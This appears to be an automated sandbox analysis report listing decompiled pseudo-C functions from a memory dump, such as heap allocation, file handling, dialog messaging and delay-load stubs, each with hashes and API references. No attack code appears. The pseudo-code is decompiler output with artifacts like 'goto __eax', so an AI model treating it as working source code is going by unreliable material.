                • Instruction Fuzzy Hash: 63215E71D0424A9BCF14DFA5C9919FEB7F4EF19314F0404AEE909A7242D7356E05DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E00CA910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                				void* _t21;
                				intOrPtr _t22;
                				intOrPtr _t27;
                				void* _t35;
                				intOrPtr _t37;
                				intOrPtr _t40;
                				void* _t42;
                				void* _t49;
                
                				_t35 = __edx;
                				E00CBD870(E00CD1321, _t42);
                				E00CA6ED7(_t42 - 0x20, E00CA7C3C());
                				_push( *((intOrPtr*)(_t42 - 0x1c)));
                				_push( *((intOrPtr*)(_t42 - 0x20)));
                				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                				_t40 = E00CAC70F();
                				if(_t40 > 0) {
                					_t27 =  *((intOrPtr*)(_t42 + 0x10));
                					_t37 =  *((intOrPtr*)(_t42 + 0xc));
                					do {
                						_t22 = _t40;
                						asm("cdq");
                						_t49 = _t35 - _t27;
                						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
                							_t40 = _t37;
                						}
                						if(_t40 > 0) {
                							E00CAC8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
                							asm("cdq");
                							_t37 = _t37 - _t40;
                							asm("sbb ebx, edx");
                						}
                						_push( *((intOrPtr*)(_t42 - 0x1c)));
                						_push( *((intOrPtr*)(_t42 - 0x20)));
                						_t40 = E00CAC70F();
                					} while (_t40 > 0);
                				}
                				_t21 = E00CA159C(_t42 - 0x20); // executed
                				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
                				return _t21;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: b40a3472c36ef966ed0d95339561f7842acb71bbfb9f5f501a613036e7090887
                • Instruction ID: 5fc097133a21289fc4eaa63bd129d23397d79f5a8a008d67c67926d6969e9026
                • Opcode Fuzzy Hash: b40a3472c36ef966ed0d95339561f7842acb71bbfb9f5f501a613036e7090887
                • Instruction Fuzzy Hash: DF11E577E0042BA7CF12AB98CC829EEB736FF49344F054115FD11A7252CA348D0497E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00CBC6FF(void* __ecx, void* __eflags) {
                				void* __ebx;
                				intOrPtr _t18;
                				char _t19;
                				char _t20;
                				void* _t23;
                				void* _t24;
                				void* _t26;
                				void* _t37;
                				void* _t43;
                				intOrPtr _t45;
                
                				_t26 = __ecx;
                				E00CBD870(E00CD1520, _t43);
                				_push(_t26);
                				E00CBD940();
                				_push(_t24);
                				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
                				E00CC4D7E(0xcf39fa, "X");
                				E00CAFB08(0xcf5a1c, _t37, 0xcd22e0);
                				E00CC4D7E(0xcf4a1a,  *((intOrPtr*)(_t43 + 0xc)));
                				E00CA5A9F(0xceb708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
                				_t4 = _t43 - 4;
                				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                				_t18 = 2;
                				 *0xcf29d8 = _t18;
                				 *0xcf29d4 = _t18;
                				 *0xcf29d0 = _t18;
                				_t19 =  *0xce75d4; // 0x0
                				 *0xcf185b = _t19;
                				_t20 =  *0xce75d5; // 0x1
                				 *0xcf1894 = 1;
                				 *0xcf1897 = 1;
                				 *0xcf185c = _t20;
                				E00CA7ADF(_t43 - 0x2108, _t37,  *_t4, 0xceb708);
                				 *(_t43 - 4) = 1;
                				E00CA7C55(_t43 - 0x2108, _t37,  *_t4);
                				_t23 = E00CA7B71(_t24, _t43 - 0x2108, _t37); // executed
                				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
                				return _t23;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00CBC704
                  • Part of subcall function 00CA7ADF: __EH_prolog.LIBCMT ref: 00CA7AE4
                  • Part of subcall function 00CA7ADF: new.LIBCMT ref: 00CA7B28
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 91833a69e93ed5eeac4b5ded2b857433e70ccba574f334f4728f3fdc099ebaeb
                • Instruction ID: 186e6da3a6d7b8c2b6ad31dfc56baa51ea9fc2392da34230aea5f8a0e01b733a
                • Opcode Fuzzy Hash: 91833a69e93ed5eeac4b5ded2b857433e70ccba574f334f4728f3fdc099ebaeb
                • Instruction Fuzzy Hash: 0D113A71509284AEC704EBA8ED02BFD7FB0EB65324F04416FF50557292DBB10A80EB22
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00CC7A8A(void* __ecx, long _a4) {
                				void* __esi;
                				void* _t4;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                				long _t9;
                
                				_t7 = __ecx;
                				_t9 = _a4;
                				if(_t9 > 0xffffffe0) {
                					L7:
                					 *((intOrPtr*)(E00CC7ECC())) = 0xc;
                					__eflags = 0;
                					return 0;
                				}
                				if(_t9 == 0) {
                					_t9 = _t9 + 1;
                				}
                				while(1) {
                					_t4 = RtlAllocateHeap( *0xd00874, 0, _t9); // executed
                					if(_t4 != 0) {
                						break;
                					}
                					__eflags = E00CC7906();
                					if(__eflags == 0) {
                						goto L7;
                					}
                					_t6 = E00CC6763(_t7, _t8, _t9, __eflags, _t9);
                					_pop(_t7);
                					__eflags = _t6;
                					if(_t6 == 0) {
                						goto L7;
                					}
                				}
                				return _t4;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 1a3c2d7fa98ad6604a703da9df34e76c6e8ae7a7bd480068d4dfdb2860698530
                • Instruction ID: 0a9ea2eac59c83de496915e89f5d056558b5274a4d664933589b14d14aa760ee
                • Opcode Fuzzy Hash: 1a3c2d7fa98ad6604a703da9df34e76c6e8ae7a7bd480068d4dfdb2860698530
                • Instruction Fuzzy Hash: F3E065319492217AD7212666DE05F5E7A49EB517B1F19236DEC24961D0CB21CF00BAE1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00CA5A1D(intOrPtr __ecx, void* __eflags) {
                				intOrPtr _t25;
                				intOrPtr _t34;
                				void* _t36;
                
                				_t25 = __ecx;
                				E00CBD870(E00CD1216, _t36);
                				_push(_t25);
                				_t34 = _t25;
                				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                				E00CAAD1B(_t25); // executed
                				_t2 = _t36 - 4;
                				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                				E00CAFAE6();
                				 *(_t36 - 4) = 1;
                				E00CAFAE6();
                				 *(_t36 - 4) = 2;
                				E00CAFAE6();
                				 *(_t36 - 4) = 3;
                				E00CAFAE6();
                				 *(_t36 - 4) = 4;
                				E00CAFAE6();
                				 *(_t36 - 4) = 5;
                				E00CA5C12(_t34,  *_t2);
                				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                				return _t34;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00CA5A22
                  • Part of subcall function 00CAAD1B: __EH_prolog.LIBCMT ref: 00CAAD20
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 4458261e4166b79041e074b23d19b3ce9c41eb0c685eae0ebc361f36597da168
                • Instruction ID: 4f94f06267ad1da7866a498617b98de03f38ccb3c57a52fae37387774f2ac6f4
                • Opcode Fuzzy Hash: 4458261e4166b79041e074b23d19b3ce9c41eb0c685eae0ebc361f36597da168
                • Instruction Fuzzy Hash: 0C01D130919656DAD705E7E4C1053EEB7B49F16318F0005ADE44E53382DBB82B04F763
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00CA94DA(void* __ecx) {
                				void* _t16;
                				void* _t21;
                
                				_t21 = __ecx;
                				_t16 = 1;
                				if( *(__ecx + 4) != 0xffffffff) {
                					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
                						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
                						asm("sbb bl, bl");
                						_t16 =  ~_t5 + 1;
                					}
                					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
                				}
                				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
                				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
                					E00CA6C7B(0xce00e0, _t21 + 0x1e);
                				}
                				return _t16;
                			}






                APIs
                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CA94AA), ref: 00CA94F5
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 3966f949828ce5d4b9653bb8353d8a3250eba7131e25cb8806eb89dbf5183488
                • Instruction ID: 4d119f0a81593444f975bc0a613bbf0cde641f64491a63e41accb384e29d0884
                • Opcode Fuzzy Hash: 3966f949828ce5d4b9653bb8353d8a3250eba7131e25cb8806eb89dbf5183488
                • Instruction Fuzzy Hash: 98F05EB0842B064EDB318A24C54B792B7E8DB13739F088B1E90F7438E0D7716A8D9B51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CAA1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                				void* _t12;
                				intOrPtr _t20;
                
                				_t20 = _a8;
                				 *((char*)(_t20 + 0x1044)) = 0;
                				if(E00CAB5E5(_a4) == 0) {
                					_t12 = E00CAA2DF(__edx, 0xffffffff, _a4, _t20);
                					if(_t12 == 0xffffffff) {
                						goto L1;
                					}
                					FindClose(_t12); // executed
                					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
                					 *((char*)(_t20 + 0x100c)) = E00CA9ECD( *((intOrPtr*)(_t20 + 0x1008)));
                					 *((char*)(_t20 + 0x100d)) = E00CA9EE5( *((intOrPtr*)(_t20 + 0x1008)));
                					return 1;
                				}
                				L1:
                				return 0;
                			}






                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA1E0
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 5b9424f2878aa648ce551d103e5b98c9aa39bdf499e98940e47a86acc9cd4db5
                • Instruction ID: 9b624cc1bb74bfa204d5ec2e76316360b789d2f523806dac5308ba4c51feccc0
                • Opcode Fuzzy Hash: 5b9424f2878aa648ce551d103e5b98c9aa39bdf499e98940e47a86acc9cd4db5
                • Instruction Fuzzy Hash: 37F08235009781BBCA225BB44805BCBBBA16F1733AF048A4DF1FD52193C7765495E722
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00CB02E8() {
                				void* __esi;
                				void* _t2;
                
                				E00CB0FAF(); // executed
                				_t2 = E00CB0FB4();
                				if(_t2 != 0) {
                					_t2 = E00CA6CC9(_t2, 0xce00e0, 0xff, 0xff);
                				}
                				if( *0xce00eb != 0) {
                					_t2 = E00CA6CC9(_t2, 0xce00e0, 0xff, 0xff);
                				}
                				__imp__SetThreadExecutionState(1);
                				return _t2;
                			}






                APIs
                • SetThreadExecutionState.KERNEL32 ref: 00CB031D
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: a5effb8ca096754eff29a0e3c2eadfef2d1ee5f340ee3a651ade6f2951d44533
                • Instruction ID: 5b021dfe86ba9cead5b8418a1856baaaa8abac0ce6a67d02f4cd6db4c279cb05
                • Opcode Fuzzy Hash: a5effb8ca096754eff29a0e3c2eadfef2d1ee5f340ee3a651ade6f2951d44533
                • Instruction Fuzzy Hash: E8D02B2070119012DF2133AC28497FF074A4FC2728F2C006AB045263D3CB8908CBB3E1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00CB95CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				void* _t6;
                
                				_push(__ecx);
                				_push(0x10);
                				L00CBD7F6();
                				_v8 = __eax;
                				if(__eax == 0) {
                					return 0;
                				}
                				_t6 = E00CB938E(__eax, _a4, _a8); // executed
                				return _t6;
                			}






                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 00CB95D5
                  • Part of subcall function 00CB938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CB93AF
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                • Instruction ID: 3df2b238076cfd372397b2312c79360dc653d6c182955eed8835ea941797bf06
                • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                • Instruction Fuzzy Hash: B4D0A73024410D7BDF61FA758C02FFE7A98DB00310F004125BD06C5151FD71DE10B2A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CA9745(void* __ecx) {
                				long _t3;
                
                				if( *(__ecx + 4) != 0xffffffff) {
                					_t3 = GetFileType( *(__ecx + 4)); // executed
                					if(_t3 == 2 || _t3 == 3) {
                						return 1;
                					} else {
                						return 0;
                					}
                				} else {
                					return 0;
                				}
                			}





                APIs
                • GetFileType.KERNELBASE(000000FF,00CA9683), ref: 00CA9751
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 024377f2f7df05f5810e352caa2f93ad0aa1a2ba3799d511722310f9832ed7d5
                • Instruction ID: 0fd7c4f21eb6451e2e11f696905d6a9e2f62a8c7c2bb2ebfb0928f1ddd232f1e
                • Opcode Fuzzy Hash: 024377f2f7df05f5810e352caa2f93ad0aa1a2ba3799d511722310f9832ed7d5
                • Instruction Fuzzy Hash: 74D01230031601958F211E3C4E4A0997755DF8336E738C6A4D135C40B1D732C903F520
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBC9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                				void* _t7;
                
                				SendDlgItemMessageW( *0xce75c8, 0x6a, 0x402, E00CAF749(_a20, _a24, _a28, _a32), 0); // executed
                				_t7 = E00CBA388(); // executed
                				return _t7;
                			}





                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00CBCA23
                  • Part of subcall function 00CBA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBA399
                  • Part of subcall function 00CBA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBA3AA
                  • Part of subcall function 00CBA388: IsDialogMessageW.USER32(000202DA,?), ref: 00CBA3BE
                  • Part of subcall function 00CBA388: TranslateMessage.USER32(?), ref: 00CBA3CC
                  • Part of subcall function 00CBA388: DispatchMessageW.USER32(?), ref: 00CBA3D6
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 1594b2f110f26cccc2d0f87de7f18884f7bf229d3e0174040de7e02816a4c5dd
                • Instruction ID: cc517b7712e9c24ab14c1476a521258f1f8e5c3730dbdf064588af95f6bcfd05
                • Opcode Fuzzy Hash: 1594b2f110f26cccc2d0f87de7f18884f7bf229d3e0174040de7e02816a4c5dd
                • Instruction Fuzzy Hash: F8D09236159300AADB022BA1CE06F0E7AF6AB8CB09F004659B285740B18672ED21AB12
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD1C9() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf0c); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 25a9acc15338df497f311b4985af4a87f23ab1c00fbc5683c2815c03d0a849cd
                • Instruction ID: 1ae0d6f10ab852f636517a3668539e433ee3196cff95432953a79636000cbfb4
                • Opcode Fuzzy Hash: 25a9acc15338df497f311b4985af4a87f23ab1c00fbc5683c2815c03d0a849cd
                • Instruction Fuzzy Hash: D2B012E2758000BD3104B2496C02D7B031DC0C0B34730C06BF507C5280F4404C051036
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD1DD() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf04); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8d15df0a79234cd93e613b3ca1b241fc548e2121a08ffb3a9fad7c703ed605b2
                • Instruction ID: 060f7716b223ce5b90d8db095f5de970a0f9944adddb98ba14ce7cede012b4f7
                • Opcode Fuzzy Hash: 8d15df0a79234cd93e613b3ca1b241fc548e2121a08ffb3a9fad7c703ed605b2
                • Instruction Fuzzy Hash: 3DB012E2758000BD3104B249AD02D7B020CC0C0B34730806BF107C5240F4414C061036
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD1A4() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf08); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b68c234e8531cacb98fa611f39dbfffd56993c79ccd89fe62d89f7b94a37b6c9
                • Instruction ID: 9f6d06a797ce65eb59ed9b5cdd3620d32d8f6542a875b1c56c89bb0044e6c34a
                • Opcode Fuzzy Hash: b68c234e8531cacb98fa611f39dbfffd56993c79ccd89fe62d89f7b94a37b6c9
                • Instruction Fuzzy Hash: 85B012E2798104BD31047245ED02C7B020DC1C0B34730856BF103C4180F4404C451036
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD1BF() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf10); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2818c75c13df2ca9ffe850d868285a292d61ec9c9d7acfe4fc30df062e92600d
                • Instruction ID: 7a451215f90e92375dbce1cb3bd529a4d71628707fc3e1ccf6f5f7fff075d70d
                • Opcode Fuzzy Hash: 2818c75c13df2ca9ffe850d868285a292d61ec9c9d7acfe4fc30df062e92600d
                • Instruction Fuzzy Hash: 22B012D2798000BD3114B2496C02C7B020CD0C0B34730846BF107C4288F4404C051036
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD205() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab8c, 0xcddff8); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a794de805bb43a64f4cffca3b3a6e7ff163282d3c918115e2f92287837d07cf9
                • Instruction ID: 4aedaa5ffc14f9ee3aa0b5a82c6366c6cec6ca59816abf0a4895ac4753f243c3
                • Opcode Fuzzy Hash: a794de805bb43a64f4cffca3b3a6e7ff163282d3c918115e2f92287837d07cf9
                • Instruction Fuzzy Hash: F1B012D52D9100BD310812A56C02C77030CD1C0F38730852BF113C0184B4408C491033
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD23E() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab8c, 0xcddff0); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3375811d947069fde75ab25ea5020f5ca23eaa1d0707e29356320c37c87c7c17
                • Instruction ID: 16a4a99df5c2d7d5178f7afb3e28538a2880f8f5e60e7219da80d150d83d834f
                • Opcode Fuzzy Hash: 3375811d947069fde75ab25ea5020f5ca23eaa1d0707e29356320c37c87c7c17
                • Instruction Fuzzy Hash: D5B012D52D9000BD310852A96C02E77034CE0C0B38730802BF107C1244F4408C091033
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD234() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab8c, 0xcddffc); // executed
                				goto __eax;
                			}









                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3137cdf6d60abd1cd0880fff04257999446d41b3dd5563de1a38df4e97e84870
                • Instruction ID: 40da89577c2ce40716de9e9ecd7efaa7d8389bacb39b533a3ad6c3ffa060952a
                • Opcode Fuzzy Hash: 3137cdf6d60abd1cd0880fff04257999446d41b3dd5563de1a38df4e97e84870
                • Instruction Fuzzy Hash: 87B012D5299000BD310852A96C02D77034DD0C0B38730C02BF507C1240F4408C091033
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CBD7DA() {
                				void* _t3;
                				void* _t4;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_push(_t4);
                				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdabcc, 0xcddeb4); // executed
                				goto __eax;
                			}








                0x00cbd7e4
                0x00cbd7ec
                0x00cbd7f3

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD7EC
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ff12f20a6fd1c92d2af445e165f1c780f29adda532afe045e30d82b39b285c98
                • Instruction ID: 9f6e37c0bea6c96cf520eb17edf4334ccdef2f5a4ee28340da08ddb620e74ec0
                • Opcode Fuzzy Hash: ff12f20a6fd1c92d2af445e165f1c780f29adda532afe045e30d82b39b285c98
                • Instruction Fuzzy Hash: 2BB012D1258103FF310461116E02CB7030CC0D0B2C730812BF103D4184B8419C061032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00CBD1D8() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_push(0xcdab6c); // executed
                				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
                				goto __eax;
                			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
